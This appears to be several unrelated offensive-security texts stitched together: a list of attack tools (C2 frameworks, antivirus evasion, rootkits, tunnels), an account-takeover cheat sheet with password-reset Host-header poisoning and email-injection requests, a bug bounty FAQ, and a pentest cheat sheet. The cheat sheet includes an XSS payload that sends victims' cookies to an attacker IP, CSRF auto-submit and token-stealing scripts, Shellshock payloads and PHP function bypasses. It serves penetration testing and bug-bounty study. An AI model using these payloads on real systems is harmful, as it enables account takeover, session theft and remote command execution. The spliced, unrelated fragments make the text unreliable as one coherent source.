* [PE-Linux](https://github.com/WazeHell/PE-Linux) - Linux Privilege Escalation Tool By WazeHell
* [Portia](https://github.com/SpiderLabs/portia) - Portia aims to automate a number of techniques commonly performed on internal network penetration tests after a low privileged account has been compromised.
* [PEASS-ng](https://github.com/carlospolop/PEASS-ng) - PEASS - Privilege Escalation Awesome Scripts SUITE (with colors)
* [GTFOBins](https://gtfobins.github.io/) - GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.
* [LOLBAS](https://lolbas-project.github.io/) - Living Off The Land Binaries, Scripts and Libraries.
* [WADComs](https://wadcoms.github.io/) - WADComs is an interactive cheat sheet, containing a curated list of offensive security tools and their respective commands, to be used against Windows/AD environments.
* [HijackLibs](https://hijacklibs.net/) - DLL Hijacking is, in the broadest sense, tricking a legitimate/trusted application into loading an arbitrary DLL.
* [GTFOBLookup](https://github.com/nccgroup/GTFOBLookup) - Offline command line lookup utility for GTFOBins、LOLBAS and WADComs.
* [PrintNotifyPotato](https://github.com/BeichenDream/PrintNotifyPotato) - PrintNotifyPotato
#### C2
* [DeimosC2](https://github.com/DeimosC2/DeimosC2) - DeimosC2 is a Golang command and control framework for post-exploitation.
* [Sliver](https://github.com/BishopFox/sliver) - Implant framework
* [PHPSploit](https://github.com/nil0x42/phpsploit) - Full-featured C2 framework which silently persists on webserver via evil PHP oneliner 😈
* [Shad0w](https://github.com/bats3c/shad0w) - A post exploitation framework designed to operate covertly on heavily monitored environments (Win8、Win10)
* [Covenant](https://github.com/cobbr/Covenant) - Covenant is a collaborative .NET C2 framework for red teamers.
* [Emp3r0r](https://github.com/jm33-m0/emp3r0r) - linux post-exploitation framework made by linux user
* [C3](https://github.com/FSecureLABS/C3) - Custom Command and Control (C3). A framework for rapid prototyping of custom C2 channels, while still providing integration with existing offensive toolkits.
* [byob](https://github.com/malwaredllc/byob) - An open-source post-exploitation framework for students, researchers and developers.
* [Havoc](https://github.com/HavocFramework/Havoc) - Havoc is a modern and malleable post-exploitation command and control framework.
* [Villain](https://github.com/t3l3machus/Villain) - Villain is a Windows & Linux backdoor generator and multi-session handler that allows users to connect with sibling servers (other machines running Villain) and share their backdoor sessions, handy for working as a team.
#### Bypass AV
* [Shellcodeloader](https://github.com/knownsec/shellcodeloader) - ShellcodeLoader of windows can bypass AV.
* [AV_Evasion_Tool](https://github.com/1y0n/AV_Evasion_Tool) - AntiVirus Shellcode generation tool.
* [BypassAntiVirus](https://github.com/TideSec/BypassAntiVirus) - Remote control anti-kill series articles and supporting tools.
* [MateuszEx](https://github.com/sairson/MateuszEx) - Bypass AV generation tool
* [FourEye](https://github.com/lengjibo/FourEye) - AV Evasion Tool For Red Team Ops
* [Phantom-Evasion](https://github.com/oddcod3/Phantom-Evasion) - Python antivirus evasion tool
### Golang Sec Tools
> Tips: Golang is a excellent cross platform language for security.
* [Naabu](https://github.com/projectdiscovery/naabu) - A fast port scanner written in go with focus on reliability and simplicity.
* [ServerScan](https://github.com/Adminisme/ServerScan) - A high concurrency network scanning and service detection tool developed by golang.
### Reporting & Collaboration
* [Vulnreport](https://github.com/salesforce/vulnreport) - Open-source pentesting management and automation platform by Salesforce Product Security
* [Pentest-Collaboration-Framework](https://gitlab.com/invuls/pentest-projects/pcf) - Opensource, cross-platform and portable toolkit for automating routine processes when carrying out various works for testing!
* [CervantesSec](https://github.com/CervantesSec/cervantes) - Cervantes is an opensource collaborative platform for pentesters or red teams who want to save time to manage their projects, clients, vulnerabilities and reports in one place.
### Social Engineering Tools
### Code Audit
* [Cloc](https://github.com/AlDanial/cloc) - cloc counts blank lines, comment lines, and physical lines of source code in many programming languages
* [Cobra](https://github.com/WhaleShark-Team/cobra) - Source Code Security Audit
* [Cobra-W](https://github.com/LoRexxar/Cobra-W) - Cobra for white hat
* [Graudit](https://github.com/wireghoul/graudit) - Grep rough audit - source code auditing tool
* [Rips](https://github.com/ripsscanner/rips) - A static source code analyser for vulnerabilities in PHP scripts
* [Kunlun-M](https://github.com/LoRexxar/Kunlun-M) - KunLun-M is a static code analysis system that automates the detecting vulnerabilities and security issue.
### Intranet penetration
#### Service Detection
* [Netspy](https://github.com/shmilylty/netspy) - A tool to quickly detect the reachable network segments of the intranet.
* [Cube](https://github.com/JKme/cube) - Intranet penetration testing tools, weak password blasting, information collection and vulnerability scanning.
#### Port Forwarding & Proxies
* [EarthWorm](https://github.com/rootkiter/EarthWorm) - Tool for tunnel
* [Termite](https://github.com/rootkiter/Termite/) - Tool for tunnel (Version 2)
* [Frp](https://github.com/fatedier/frp) - A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet
* [Nps](https://github.com/ehang-io/nps/) - A lightweight, high-performance, powerful intranet penetration proxy server, with a powerful web management terminal.
* [Goproxy](https://github.com/snail007/goproxy) - A high-performance, full-featured, cross platform proxy server
* [ReGeorg](https://github.com/sensepost/reGeorg) - The successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn
* [Neo-reGeorg](https://github.com/L-codes/Neo-reGeorg) - Neo-reGeorg is a project that seeks to aggressively refactor reGeorg
* [Venom](https://github.com/Dliv3/Venom) - A Multi-hop Proxy for Penetration Testers
* [Stowaway](https://github.com/ph4ntonn/Stowaway) - 👻 Stowaway -- Multi-hop Proxy Tool for pentesters
* [rport](https://github.com/cloudradar-monitoring/rport) - Manage remote systems with ease.
* [PortForward](https://github.com/knownsec/PortForward) - The port forwarding tool developed by Golang solves the problem that the internal and external networks cannot communicate in certain scenarios.
* [Suo5](https://github.com/zema1/suo5) - A high-performance http proxy tunneling tool
### DevSecOps
### RootKit
* [Beurk](https://github.com/unix-thrust/beurk) - BEURK Experimental Unix RootKit
* [Bedevil](https://github.com/naworkcaj/bdvl) - LD_PRELOAD Linux rootkit (x86 & ARM)
### Audit Tools
* [DevAudit](https://github.com/OSSIndex/DevAudit) - Open-source, cross-platform, multi-purpose security auditing tool
### Pentesting Distribution
* [Backbox Linux](https://linux.backbox.org) - penetration testing and security assessment oriented Linux distribution
* [Kali Linux](https://www.kali.org) - Debian-based pentesting distribution
* [BlackArch Linux](https://blackarch.org) - Arch Linux-based penetration testing distribution
* [Parrot Security](https://parrotlinux.org) - The ultimate framework for your Cyber Security operations
* [ArchStrike](https://archstrike.org) - Arch Linux respository for security professionals
### Cyber Range
#### Vulnerability application
* [DVWA](https://github.com/ethicalhack3r/DVWA) - Damn Vulnerable Web Application (DVWA)
* [WebGoat](https://github.com/WebGoat/WebGoat) - WebGoat is a deliberately insecure web application maintained by OWASP designed to teach web application security lessons
* [DSVW](https://github.com/stamparm/DSVW) - DSVW is a deliberately vulnerable web application written in under 100 lines of code, created for educational purposes
* [DVWS](https://github.com/snoopysecurity/dvws) - Damn Vulnerable Web Services is an insecure web application with multiple vulnerable web service components that can be used to learn real world web service vulnerabilities
* [XVWA](https://github.com/s4n7h0/xvwa) - XVWA is a badly coded web application written in PHP/MySQL that helps security enthusiasts to learn application security
* [BWAPP](http://www.mmebvba.com/sites/bwapp/index.htm) - A buggy web application whit more than 100 vulnerabilities
* [Sqli-lab](https://github.com/Audi-1/sqli-labs) - SQLI labs to test error based, Blind boolean based, Time based
* [HackMe-SQL-Injection-Challenges](https://github.com/breakthenet/HackMe-SQL-Injection-Challenges) - Hack your friend's online MMORPG game - specific focus, sql injection opportunities
* [XSS-labs](https://github.com/paralax/xss-labs) - Small set of scripts to practice exploit XSS and CSRF vulnerabilities
* [SSRF-lab](https://github.com/m6a-UdS/ssrf-lab) - Lab for exploring SSRF vulnerabilities
* [SSRF_Vulnerable_Lab](https://github.com/incredibleindishell/SSRF_Vulnerable_Lab) - This Lab contain the sample codes which are vulnerable to Server-Side Request Forgery attack
* [LFI-labs](https://github.com/paralax/lfi-labs) - Small set of PHP scripts to practice exploiting LFI, RFI and CMD injection vulns
* [Commix-testbed](https://github.com/commixproject/commix-testbed) - A collection of web pages, vulnerable to command injection flaws
* [File-Upload-Lab](https://github.com/LunaM00n/File-Upload-Lab) - Damn Vulnerable File Upload V 1.1
* [Upload-labs](https://github.com/c0ny1/upload-labs) - A summary of all types of uploading vulnerabilities for you
* [XXE-Lab](https://github.com/c0ny1/xxe-lab) - A XXE vulnerability Demo containing language versions such as PHP, Java, python, C#, etc
* [Vulnerable-Flask-App](https://github.com/anil-yelken/Vulnerable-Flask-App) - Erlik2 Vulnerable-Flask-App provided by [anil-yelken](https://github.com/anil-yelken).
#### Simulation Range
* [Fopnp](https://github.com/brandon-rhodes/fopnp/tree/m/playground) - A Network Playground for
《Foundations of Python Network Programming》
* [CyberRange](https://github.com/secdevops-cuse/CyberRange) - The Open-Source AWS Cyber Range
#### Honeyhots
* [DecoyMini](https://github.com/decoymini/DecoyMini/) - A highly scalable, safe, free enterprise honeypots
#### CTF challenges
* [Vulnhub](https://www.vulnhub.com/) - VulnHub provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration
* [TryHackMe](https://tryhackme.com/) - TryHackMe is a free online platform for learning cyber security, using hands-on exercises and labs, all through your browser!
* [Hackthebox](https://www.hackthebox.com/) - Hack The Box is a massive, online cybersecurity training platform, allowing individuals, companies, universities and all kinds of organizations around the world to level up their hacking skills.
* [Root Me](https://www.root-me.org/) - Root Me allows everyone to test and improve their knowledge in computer security and hacking.
* [Pentestit](https://lab.pentestit.ru/) - Penetration testing laboratories "Test lab" emulate an IT infrastructure of real companies and are created for a legal pen testing and improving penetration testing skills
* [Pentesterlab](https://pentesterlab.com/) - Learn Web Penetration Testing: The Right Way
* [Cyberseclabs](https://www.cyberseclabs.co.uk/) - At CyberSecLabs, we aim to provide secure, high-quality training services that allow information security students the opportunity to safely learn and practice penetration testing skills.
* [Web Security Academy](https://portswigger.net/web-security) - Free, online web security training from the creators of Burp Suite
* [Vulnmachines](https://www.vulnmachines.com/) - A place to learn and improve penetration testing/ethical hacking skills for FREE
### Excellent project
* [Rawsec's CyberSecurity Inventory](https://inventory.raw.pm/tools.html#title-tools-osint-and-reconnaissance) - An inventory of tools and resources about CyberSecurity.
* [All-Defense-Tool](https://github.com/guchangan1/All-Defense-Tool) - A List for Defense Tools.
* [Awesome-POC](https://github.com/Threekiii/Awesome-POC) - A POC knowledge base of various vulnerabilities.
|
# Adding or changing email addresses
If the operations of adding a new email address or changing an existing one do not require password confirmation, session hijacking, XSS or CSRF can lead to account takeover.
# Amazon Cognito misusing
{% embed url="https://0xn3va.gitbook.io/cheat-sheets/cloud/aws/amazon-cognito" %}
# Email confirmation
## Binding an email using a confirmation link
Try to follow a confirmation link for account `A` within the session of account `B` within an email confirmation flow. If an application is vulnerable, it will link the verified email to account `B`. In this case, the attack flow may look like:
1. An attacker links `attacker@website.com` to their account.
1. An attacker sends a confirmation link to a victim.
1. A victim follows the link from an email while logged into an application.
1. An application links `attacker@website.com` to a victim.
References:
- [Writeup: Watch out the links : Account takeover!](https://akashhamal0x01.medium.com/watch-out-the-links-account-takeover-32b9315390a7)
## Confirmation of multiple emails
A method for adding new emails can accept several email address in a single request. However, the method can create a one-time token based on only one email, but send an email with a recovery link to all passed emails at once. For instance, if an application is vulnerable to such an attack, on the following request:
```http
PUT /user/profile HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/json
Content-Length: 57
{"email": ["victim@website.com", "attacker@website.com"]}
```
an application sends the same confirmation link to two email addresses.
You can also try the following payloads:
```http
victim@website.com&attacker@website.com
victim@website.com,attacker@website.com
victim@website.com|attacker@website.com
victim@website.com%20attacker@website.com
victim@website.com%09attacker@website.com
victim@website.com%0a%0dcc:attacker@website.com
...
```
Another similar case is if there is a business logic vulnerability when confirmation link is sent to a wrong email. For example, if an application sends a confirmation link to an already added, main email, instead of an unconfirmed one.
References:
- [Report: Email Confirmation Bypass in myshop.myshopify.com that Leads to Full Privilege Escalation to Any Shop Owner by Taking Advantage of the Shopify SSO](https://hackerone.com/reports/791775)
## Skipping the confirmation process
If an application allows you to create users without an email confirmation process, you can try to abuse that to get a new user with a pre-confirmed email. This is possible at least in the following cases:
- An application allows creation of bot users that have pre-defined confirmed emails.
- SCIM provisioning functions.
- OAuth authentication via a vulnerable service that allows using unconfirmed accounts for authentication.
References:
- [Report: Bypass Email Verification -- Able to Access Internal Gitlab Services that use Login with Gitlab and Perform Check on email domain](https://gitlab.com/gitlab-org/gitlab/-/issues/11643)
## Using unconfirmed emails
If an application allows using unconfirmed emails, try to abuse this behavior in flows where an application or other applications/systems rely on an email address. For example:
- If there are applications/systems that blindly trust the data of a vulnerable application, you can try to abuse this trust. For example, if an application can be used as an OAuth authorization server, try using an account with an unconfirmed email to authenticate to a third-party application using OAuth, you can find more details at [OAuth 2.0 Vulnerabilities: Abusing accounts with unconfirmed email](/Web%20Application/OAuth%202.0%20Vulnerabilities/README.md#abusing-accounts-with-unconfirmed-email).
- Try using unconfirmed emails to preoccupy emails that may be used by other users or used internally by an application. In this case, you can block some application functions for all or specific users.
- If some functions must not be available for users who have not confirmed their email, check that these functions are really not available for them. Additionally, make sure the REST and GraphQL APIs also abide by the same policy.
## Using OTP for email confirmation
{% embed url="https://0xn3va.gitbook.io/cheat-sheets/web-application/broken-authentication#phone-and-otp-authentication" %}
## Weak confirmation token
Confirmation token may be generated using a vulnerable generation algorithm, which may lead to the possibility of predicting the generated values. If you manage to predict tokens you will be able to generate valid confirmation tokens for any emails.
{% embed url="https://0xn3va.gitbook.io/cheat-sheets/web-application/weak-random-generation" %}
# Information disclosure
An application can return unknown data in response when performing an operation. These can be requested passwords, generated OTP, cookies with additional privileges, user data, detailed error messages, and etc. Check the response from the server for such data.
# OAuth 2.0
{% embed url="https://0xn3va.gitbook.io/cheat-sheets/web-application/oauth-2.0-vulnerabilities" %}
# Password recovery
## Host header poisoning
An applications can use `Host` header value for generating a password recovery link. If an application is vulnerable to `Host` header poisoning, you can affect the link and specify your domain name. As a result, if a victim follows the link from the email, a recovery token will leak to your domain.
There are several ways to implement `Host` header poisoning.
### Host header replacement
You can try to replace the `Host` header on your domain. Examples of vulnerable requests:
```http
POST /users/password HTTP/1.1
Host: attacker-website.com
Content-Type: application/json
Content-Length: 31
{"email": "victim@website.com"}
```
Or bypass host validation (see [SSRF: Broken parser](https://0xn3va.gitbook.io/cheat-sheets/web-application/server-side-request-forgery#broken-parser)):
```http
POST /users/password HTTP/1.1
Host: attacker-website.com/vulnerable-website.com
Content-Type: application/json
Content-Length: 31
{"email": "victim@website.com"}
```
References:
- [Write up: Password Reset link hijacking via Host Header Poisoning](https://hackerone.com/reports/226659)
### Override Host header
Components in a delivery chain, such as proxies, can pass an original host requested by the client using additional of HTTP headers:
{% embed url="https://gist.github.com/0xn3va/b8ffb5c43d8dc24cdfcfc98e1890d71f" %}
You can try to use these headers for identifying the original host requested by the client in the `Host` request header:
```http
POST /users/password HTTP/1.1
Host: vulnerable-website.com
x-forwarded-host: attacker-website.com
x-host: attacker-website.com
x-original-host: attacker-website.com
Content-Type: application/json
Content-Length: 31
{"email": "victim@website.com"}
```
References:
- [Write up: Account Takeover Through Password Reset Poisoning](https://medium.com/@vbharad/account-takeover-through-password-reset-poisoning-72989a8bb8ea)
### Several Host header
You can try to specify several `Host` headers. Example of vulnerable request:
```http
POST /users/password HTTP/1.1
Host: vulnerable-website.com
Host: attacker-website.com
Content-Type: application/json
Content-Length: 31
{"email": "victim@website.com"}
```
## Several email addresses
Password recovery method can accept multiple recovery emails in one request. However, the method can search for an account to create a one-time token based on only one email, but send an email with a recovery link to all passed emails at once. For instance, if an application is vulnerable to such an attack, on the following request:
```http
POST /users/password HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/json
Content-Length: 57
{"email": ["victim@website.com", "attacker@website.com"]}
```
an application sends the same recovery link to two email addresses.
You can also try the following payloads:
```http
victim@website.com&attacker@website.com
victim@website.com,attacker@website.com
victim@website.com|attacker@website.com
victim@website.com%20attacker@website.com
victim@website.com%09attacker@website.com
victim@website.com%0a%0dcc:attacker@website.com
...
```
References:
- [Writeup: Readme.com Account Takeover #BugBounty #FullDisclosure #Fixed](https://medium.com/@0xankush/readme-com-account-takeover-bugbounty-fulldisclosure-a36ddbe915be)
## Lack of link between account and code
Try to request an one-time token for your account and use them to recover a victim's account:
```http
POST /users/password/recovery HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/json
Content-Length: 72
{"email": "victim@website.com","code": "<code-for-an-attacker-account>"}
```
## Password recovery does not end previously created sessions
Successful password recovery should end previously created sessions. If this does not happen, an victim will not have mechanisms for managing the security of their account. As a result, an attacker will be able to maintain an active session for an extended period of time.
## Token leakage via Referer header
The [Referer](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Referer) HTTP request header contains an absolute or partial address of the page that makes the request. The `Referer` header allows a server to identify a page where people are visiting it from. This data is used for analytics, logging, optimized caching, and more.
The Referer header can contain an `origin`, `path`, and `querystring`, and may not contain URL fragments (i.e. `#section`) or `username:password` information. The request's referrer policy defines the data that can be included, see [Referrer-Policy](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Referrer-Policy).
A page with a password recovery, a link to which an application sends by email, can load third-party scripts, for instance, analytics, or contain links to third-party resources, for instance, social networks. If the password recovery link is passed into the `Referer` header when requesting these resources, an one-time token is leaked to a third-party resource, since it is passed to the `querystring`.
References:
- [Report: Cross Domain leakage of sensitive information - Leading to Account Takeover at Instagram Brand](https://hackerone.com/reports/209352)
- [Report: [Cross Domain Referrer Leakage] Password Reset Token Leaking to Third party Sites.](https://hackerone.com/reports/265740)
- [Report: Referer Referer Header Leakage in language changer may lead to FB token theft](https://hackerone.com/reports/870062)
## Weak recovery token
Recovery token may be generated using a vulnerable generation algorithm, which may lead to the possibility of predicting the generated values. If you manage to predict tokens you will be able to generate valid recovery tokens for any accounts.
{% embed url="https://0xn3va.gitbook.io/cheat-sheets/web-application/weak-random-generation" %}
# Phone and OTP authentication
## OTP resend
If an application does not set rate limits on resending OTP and resending OTP resets the set rate limits on attempts to enter OTP, an application is vulnerable to OTP bruteforce.
References:
- [Report: Authorization bypass using login by phone option+horizontal escalation possible on Grab Android App](https://hackerone.com/reports/205000)
## OTP reusing
If an application allows using of old OTPs that have been used or re-generated, any leakage of OTPs (for example, to logs or third-party services) will compromise the functionality that relies on OTPs.
## Session fixation
An application can implement the authentication flow as the following one:
1. An application calls `/SessionCreate` endpoint with a mobile phone number of a user
2. A backend creates a session for a user and returns a session token, but no operations with this session are possible until the verification is complete
3. An SMS message is sent to a user with a verification code
4. An application calls `/SessionVerify` endpoint with both the session token and the verification code received by SMS
5. Once this request is successfully completed, the session token becomes valid and the user is now logged in
If subsequent calls to `/SessionCreate` return the same session token as the first one until a call to `/SessionVerify`, you can use `/SessionCreate` endpoint to fecth a session token, that will valid after victim's authentication.
References:
- [Report: Account Takeover via SMS Authentication Flow](https://hackerone.com/reports/1245762)
## Spoofing part of an authentication request
If during the OTP check an application additionally uses some parameters, try to use a value from a request for a different account. This parameter can be a cookie, header, or request parameter. If you use the parameter value for a victim in the OTP check request for an attacker, you can get into a victim account or bypass two-factor authentication.
Additionally, try to re-use the valid OTP value for an attacker as the OTP value for a victim. If an application does not verify that the OTP belongs to an attacker, you will be able to get into a victrim account or bypass two-factor authentication.
## Short and long-lived OTP
An application can use short (less 5 digits) and/or long-lived OTPs. Such implementation leaves many ways to bruteforce, especially if there are no rate limits, or they are weak or can be bypassed.
# Rate limits
{% embed url="https://0xn3va.gitbook.io/cheat-sheets/web-application/improper-rate-limits" %}
# Third-party sign-in or sign-up
Applications that implement third party sign-in or sign-up often identify users based on the attached email address that the third party application sends. In such cases, you can try sign-in or sign-up with two different third-party applications that are linked to the same email address. Sometimes these two accounts can be joined and you will have access to the victim's account by sign-in or sign-up with your third-party application account.
For example, suppose a victim sign-in or sign-up to `vulnerable-website.com` with `third-party-app1.com`, which is linked to `victim@website.com`. To exploit this, try the following chain:
1. Create an account at `third-party-app2.com` and enter the `victim@website.com` email address (ideal if email confirmation is not required)
2. Try sign-in or sign-up at `vulnerable-website.com` through `third-party-app2.com`
3. If the application is vulnerable, you will have access to the victim's account
References:
- [Write up: account takeover https://teamplay.qiwi.com](https://hackerone.com/reports/439207)
# Username and password authentication
## Bruteforce
If an application does not set rate limits on login attempts, try to craft a dictionary and bruteforce a password.
One of the implementations of rate limits uses a username or email as an identifier to count attempts. Try to bypass the protection by using extra spaces or upper/lower case:
```http
email=" username@website.com"
email="username@website.com "
email="Username@website.com"
email="USERNAME@website.com"
...
```
You can use the following links:
- [WordList Compendium](https://github.com/Dormidera/WordList-Compendium) - personal compilation of wordlists & dictionaries for everything; users, passwords, directories, files, vulnerabilities, fuzzing, injections, wordlists of tools, etc.
- [SecLists](https://github.com/danielmiessler/SecLists) - a collection of multiple types of lists used during security assessments.
- [PWDB - New generation of Password Mass-Analysis](https://github.com/ignis-sec/Pwdb-Public) - a collection of all the data extracted from 1 billion credential leaks from the Internet.
- [bopscrk](https://github.com/r3nt0n/bopscrk) - tool to generate smart and powerful wordlists.
- [BruteLoops](https://github.com/arch4ngel/BruteLoops) - protocol agnostic online password guessing API.
References:
- [Report: Bypass a fix for report #708013](https://hackerone.com/reports/1363672)
## Credential stuffing
[Credential stuffing](https://owasp.org/www-community/attacks/Credential_stuffing) is a search for leaked usernames and passwords for use in popular online services, as most users are "comfortable" using the same password everywhere.
You can use the following lists:
- [PWDB - New generation of Password Mass-Analysis](https://github.com/ignis-sec/Pwdb-Public)
- [SecLists](https://github.com/danielmiessler/SecLists)
- [Probable Wordlists - Version 2.0](https://github.com/berzerk0/Probable-Wordlists)
Resources:
- [Writeup: Credential stuffing in Bug bounty hunting](https://krevetk0.medium.com/credential-stuffing-in-bug-bounty-hunting-7168dc1d3153)
- Zeronights 2021: Valeriy Shevchenko – Fantastic bugs and where to find them
- [Video](https://www.youtube.com/watch?v=5rDGNm3DJfU)
- [Slides](https://zeronights.ru/wp-content/uploads/2021/09/valeri_shevchenko_fantastic_b%CC%B6e%CC%B6a%CC%B6s%CC%B6t%CC%B6s%CC%B6_bugs_and_where_to_find_them_1.pdf)
## Default credentials
Try to login with default credentials into admin panels, third-party services, middleware, and etc.
You can use the following lists:
- [Default Credentials Cheat Sheet](https://github.com/ihebski/DefaultCreds-cheat-sheet)
- [SecLists Default Credentials](https://github.com/danielmiessler/SecLists/tree/master/Passwords/Default-Credentials)
## Lack of restrictions on password length
Most applications store hashes of user passwords and do not store passwords in clear text. Accordingly, an application hashes passed password and checks the hash against the one stored in a database when authenticating a user. Moreover, functions with sliding computational cost are often used as a hashing function, the computational complexity of which is much higher than common hash functions such as `sha256`. Therefore, if an application does not implement restrictions on the length of passwords, this can be used for DoS: hashing very long passwords can be resource intensive.
# References
- [HackTricks: Reset/Forgotten Password Bypass](https://book.hacktricks.xyz/pentesting-web/reset-password)
- [Two-factor authentication security testing and possible bypasses](https://medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35)
|
## Frequently Asked Questions (FAQ)
### What are the different issue states in Jira?
| State | Description |
| --- | --- |
| `OPEN` | New submission |
| `ACKNOWLEDGED` | Submission acknowledged by the bug bounty team |
| `IN PROGRESS` | Submission was handed over to the responsible team |
| `PENDING INTERNAL` | Issue requires in-depth analysis, e.g. when further parties (vendors, suppliers, etc) are involved. |
| `PENDING REPORTER` | Additional information about the vulnerability required from the reporter |
| `VERIFICATION` | Request confirmation of the fix by the reporter |
| `RESOLVED` | Vulnerability was remediated |
| `GATHER METADATA` | Bug bounty team collects all information required to assess the impact of the reported vulnerability |
| `REQ. BANK DETAILS` | Bank account information required from the reporter |
| `PAYOUT INITIATED` | Bounty was assigned and payment process initiated |
| `CLOSED` | Payout succeeded and issue is closed |
### What's in scope, what's out of scope?
There are two lists which define the scope of the Swisscom bug bounty programme. You can think of them as a combination of an allow-list ([in-scope.txt](https://github.com/swisscom/bugbounty/blob/main/scope/inscope.txt)) and a block-list ([out-of-scope.txt](https://github.com/swisscom/bugbounty/blob/main/scope/outofscope.txt)).
* The notation `*.domain.tld` means: _a domain and all of its subdomains_.
* The entries in [out-of-scope.txt](https://github.com/swisscom/bugbounty/blob/main/scope/outofscope.txt) always take precedence over [in-scope.txt](https://github.com/swisscom/bugbounty/blob/main/scope/inscope.txt).
As an example, the more specific domains `*.cust.swisscom.ch` from [out-of-scope.txt](https://github.com/swisscom/bugbounty/blob/main/scope/outofscope.txt) are excluded from the scope, even if [in-scope.txt](https://github.com/swisscom/bugbounty/blob/main/scope/inscope.txt) contains all `*.swisscom.ch` subdomains in general.
### How far should I go to prove the possible exploitation of a vulnerability?
According to our [reporting guidelines](https://github.com/swisscom/bugbounty#55-reporting-guidelines), submissions are required to include a comprehensible description of the vulnerability along with step-by-step instructions to reproduce its exploitation. The fine balance lies within providing a working proof-of-concept, which clearly demonstrates the potential security impact of the vulnerability without actually inflicting any damage.
For example, say you found a SQL injection vulnerability in an application. Exploiting the vulnerability typically allows to retrieve the entire contents of the database. However, this isn't necessary to demonstrate the existence of the vulnerability and this would actually constitute a data breach. Rather, you can either provide us with metadata (e.g. schema/table names) or a behavioral analysis of the application (e.g. time measurements of responses for time-based SQL injections).
### How can I format my report?
You can apply text formatting when submitting your report in the bug bounty portal. For details about the markup, please refer to the [Jira Text Formatting Notation](https://jira.atlassian.com/secure/WikiRendererHelpAction.jspa?section=all). Note that other markup languages such as Markdown or HTML are not supported.
### May I run automated vulnerability scans on the scope?
The use of automated tools to perform active vulnerability scanning often causes collateral damage. According to the [programme rules](https://github.com/swisscom/bugbounty#542-impact-on-operations), _you must avoid tests that could impair, interrupt or otherwise damage Swisscom services_. Therefore running such tools on the scope without taking appropriate precautions is highly discouraged and could lead to exclusion of the programme.
|
# My Security Resources
- 來幫我按星星啦 Q__Q
- https://github.com/stevenyu113228/My-Security-Resources
---
[TOC]
## Scan
### Portscan
- nmap
- Static Binary
- https://github.com/ernw/static-toolbox/releases
- https://github.com/andrew-d/static-binaries/blob/master/binaries/windows/x86/nmap.exe
- Parameters
- `-A` : Enable OS detection, version detection, script scanning, and traceroute
- `-p-` : Scan all ports
- `-p 1000-9999` : Scan port from 1000 to 9999
- `-sV` : Services version
- `-Pn` : No ping
- `--script=vuln` : Scan vulnerability
- `-p139,445` : Only scan 139,445 port
- `-sn` : Host ping scan
- `--source-port 4444` : use source port 4444 to scan
- Fast UDP Scan
- `sudo nmap -sUV -T4 -F --version-intensity 0 {IP}`
- RustScan
- `rustscan -a 10.10.166.15`
- `-r 1-65535` : Port range from 1 to 65535
## Web
### Scan
- [Dirsearch](https://github.com/maurosoria/dirsearch)
- [Githack-python3](https://github.com/tigert1998/GitHack-py3)
- [FFUF](https://github.com/ffuf/ffuf)
- Fuzz sub-domain
- `ffuf -c -w /usr/share/dnsrecon/subdomains-top1mil-20000.txt -u http://{domain.name}/ -H "Host: FUZZ.{domain.name}" -fs {normal_size}`
- Wordlist
- https://github.com/danTaler/WordLists/blob/master/Subdomain.txt
- `/usr/share/dnsrecon/subdomains-top1mil.txt`
- Get Parameter
- https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/burp-parameter-names.txt
### Front-End
#### XSS
- Cheatsheet
- https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
- Steal Cookie
- `<script>new Image().src="http://{my_ip}:1234/"+document.cookie</script>`
- `nc -l 1234`
- JQuery
```
$(`h2:contains("<img src=1 onerror=alert(1)>"`)
$(`h2:contains(""<img src=1 onerror=alert(1)>`)
```
- Angular JS
- `{{constructor.constructor('alert(1)')()}}`
- JS feature
- `"<><meow>".replace("<",1).replace(">",2)` = `12<meow>`
- Replace only apply first match
#### CSRF
- POST
```html
<form id="myForm" name="myForm" action="/change_pass.php" method="POST">
<input type=hidden name="password" id="password" value="meowmeow"/>
<input type=hidden name="confirm_password" id="confirm_password" value="meowmeow"/>
<input type=hidden name="submit" id="submit" value="submit"/>
<script>document.createElement('form').submit.call(document.getElementById('myForm'))</script>
```
- Get CSRF Token Before POST
```javascript
function post_data(csrf_token){
var xhr = new XMLHttpRequest();
xhr.open("POST", '/my-account/change-email', true);
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xhr.send("email=meow%40meow.meow&csrf="+csrf_token);
}
function get_csrf() {
var re = /[A-Za-z0-9]{32}/g;
csrf_token = this.responseText.match(re)[0];
post_data(csrf_token);
}
var get_csrf_request = new XMLHttpRequest();
get_csrf_request.addEventListener("load", get_csrf);
get_csrf_request.open("GET", "https://xxx/my-account");
get_csrf_request.send();
```
### Server
#### Apache
- Default log path
- `/var/log/apache2/access.log`
- Shell Shock
- Exist some path like `/cgi-bin/*.sh`
- `dirsearch.py -u http://{IP}/cgi-bin -e cgi`
- Add `() { :;}; echo; /usr/bin/id` to User-Agent
- Must use Absolute path
- `User-Agent: (){ :; }; /bin/ping -c 1 {MY_IP}`
- `USer-Agent: () { :; }; /usr/bin/nslookup $(whoami).meow.org`
- DNS Only
- nmap test
- `nmap {IP} -p {PORT} --script=http-shellshock --script-args uri=/cgi-bin/{FILE_NAME}.cgi`
- Default config path
- `/etc/httpd/conf/httpd.conf`
#### Nginx
#### IIS
- Default web root path
- `C:\inetpub\wwwroot`
- IIS 6.0
- [CVE-2017-7269](https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269)
- Can only run once!!
#### Tomcat
- Tomcat Path
- `/manager/status/all`
- `/admin/dashboard`
- Path Bypass
- With `/..;/`
- e.g. `/manager/status/..;/html/upload`
### PHP
- Bypass `system`
- `echo passthru("whoami")`
- `echo shell_exec("whoami")`
- `echo exec("whoami")`
- Check disable function
- `phpinfo();`
- `<?php var_dump(ini_get('disable_functions'));`
- Bypass Disable Function
- https://github.com/l3m0n/Bypass_Disable_functions_Shell/blob/master/shell.php
- Wrapper
